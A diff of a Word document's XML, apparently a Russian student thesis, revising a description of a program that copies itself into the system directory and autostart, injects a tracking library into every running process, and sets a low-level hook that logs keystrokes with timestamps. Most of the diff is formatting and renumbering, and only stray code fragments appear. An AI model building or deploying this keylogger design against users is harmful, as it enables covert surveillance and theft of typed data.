-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Для реализации поставленных задач, приложение разделили на следующие блоки:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Блок установки программы</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>- Блок инжекции библиотеки</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Блок установки хука</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="360"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -3959,7 +3734,7 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:103.95pt;margin-top:31.5pt;width:238.5pt;height:224.25pt;z-index:251659264;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
+          <v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:118.8pt;margin-top:38.75pt;width:238.5pt;height:224.25pt;z-index:251659264;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
             <v:imagedata r:id="rId8" o:title="Безымянный"/>
             <w10:wrap type="topAndBottom"/>
           </v:shape>
@@ -3967,18 +3742,10 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Блок создания лог-файлов</w:t>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Для реализации поставленных задач, приложение разделили на следующие блоки:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4009,70 +3776,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Блок установки программы служит для копирования исполняемого</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> файл</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> и ря</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>дом лежащей библиотеки</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> из текущей директории в ди</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ректорию операционной системы. И</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>сполняемый</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> файл заносится в автозагрузку.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4089,28 +3792,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Блок инжекции библиотеки в</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> моме</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>нт выполнения программы создает</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> снимок всех текущих процессов. После чего во все процессы производится инжекция отслеживающей библиотеки.</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Блок установки программы</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4128,7 +3818,202 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Блок установки хука служит для установки низкоуровневого хука. И записи </w:t>
+        <w:t>- Блок инжекции библиотеки</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Блок установки хука</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Блок создания лог-файлов</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Блок установки программы служит для копирования исполняемого</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> файл</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и ря</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>дом лежащей библиотеки</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> из текущей директории в ди</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ректорию операционной системы. И</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сполняемый</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> файл заносится в автозагрузку.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Блок инжекции библиотеки в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> моме</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>нт выполнения программы создает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> снимок всех текущих процессов. После чего во все процессы производится инжекция отслеживающей библиотеки.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Блок установки хука служит для у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>становки низкоуровневого хука.  З</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">аписи </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4178,7 +4063,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="18" w:name="_Toc420705263"/>
-      <w:bookmarkStart w:id="19" w:name="_Toc420712308"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc420752649"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -4228,7 +4113,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="20" w:name="_Toc420705264"/>
-      <w:bookmarkStart w:id="21" w:name="_Toc420712309"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc420752650"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4236,7 +4121,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>4</w:t>
+        <w:t>3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5105,36 +4990,33 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">{ … </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>}</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>{ … }</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5148,26 +5030,31 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>else</w:t>
       </w:r>
     </w:p>
@@ -5182,24 +5069,21 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
         <w:t xml:space="preserve">{ … </w:t>
@@ -5266,7 +5150,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="22" w:name="_Toc420705265"/>
-      <w:bookmarkStart w:id="23" w:name="_Toc420712310"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc420752651"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5274,7 +5158,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>4</w:t>
+        <w:t>3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5480,7 +5364,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="24" w:name="_Toc420705266"/>
-      <w:bookmarkStart w:id="25" w:name="_Toc420712311"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc420752652"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5488,7 +5372,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>4</w:t>
+        <w:t>3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5753,7 +5637,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="26" w:name="_Toc420705267"/>
-      <w:bookmarkStart w:id="27" w:name="_Toc420712312"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc420752653"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5761,7 +5645,16 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>4.</w:t>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6517,7 +6410,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="28" w:name="_Toc420705268"/>
-      <w:bookmarkStart w:id="29" w:name="_Toc420712313"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc420752654"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -6746,7 +6639,21 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> в лог файл записывается соответствующее название клавиши в</w:t>
+        <w:t xml:space="preserve"> в лог файл записывается</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> время нажатия,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> соответствующее название клавиши в</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6760,7 +6667,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Это позволяет собрать полную информацию о работе пользователя.</w:t>
+        <w:t xml:space="preserve"> Данные записи </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>позволяет собрать полную информацию о работе пользователя.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6801,7 +6715,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="30" w:name="_Toc420705269"/>
-      <w:bookmarkStart w:id="31" w:name="_Toc420712314"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc420752655"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -7480,7 +7394,7 @@
       </w:r>
       <w:bookmarkStart w:id="32" w:name="_Toc414805630"/>
       <w:bookmarkStart w:id="33" w:name="_Toc420705270"/>
-      <w:bookmarkStart w:id="34" w:name="_Toc420712315"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc420752656"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -7654,7 +7568,7 @@
       <w:bookmarkStart w:id="35" w:name="_Toc414805631"/>
       <w:bookmarkStart w:id="36" w:name="_Toc419842035"/>
       <w:bookmarkStart w:id="37" w:name="_Toc420705271"/>
-      <w:bookmarkStart w:id="38" w:name="_Toc420712316"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc420752657"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -8000,7 +7914,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="39" w:name="_Toc418435891"/>
       <w:bookmarkStart w:id="40" w:name="_Toc420629807"/>
-      <w:bookmarkStart w:id="41" w:name="_Toc420712317"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc420752658"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>ПРИЛОЖЕНИЕ</w:t>
@@ -8025,7 +7939,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="42" w:name="_Toc420705273"/>
-      <w:bookmarkStart w:id="43" w:name="_Toc420712318"/>
+      <w:bookmarkStart w:id="43" w:name="_Toc420752659"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11060,7 +10974,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="44" w:name="_Toc420705274"/>
-      <w:bookmarkStart w:id="45" w:name="_Toc420712319"/>
+      <w:bookmarkStart w:id="45" w:name="_Toc420752660"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15602,6 +15516,94 @@
         <w:tab/>
         <w:t>return TRUE;}</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:ind w:firstLine="0"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="46" w:name="_Toc420752661"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>ПРИЛОЖЕНИЕ Б</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="46"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:ind w:firstLine="0"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="47" w:name="_Toc420752662"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>ПРИЛОЖЕНИЕ В</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="47"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -16474,6 +16476,119 @@
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6E5D3EE8"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1A00F5CC"/>
+    <w:lvl w:ilvl="0" w:tplc="7C08A414">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="center"/>
+      <w:pPr>
+        <w:ind w:left="1500" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04230003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2220" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04230005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04230001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3660" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04230003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4380" w:hanging="360"/>
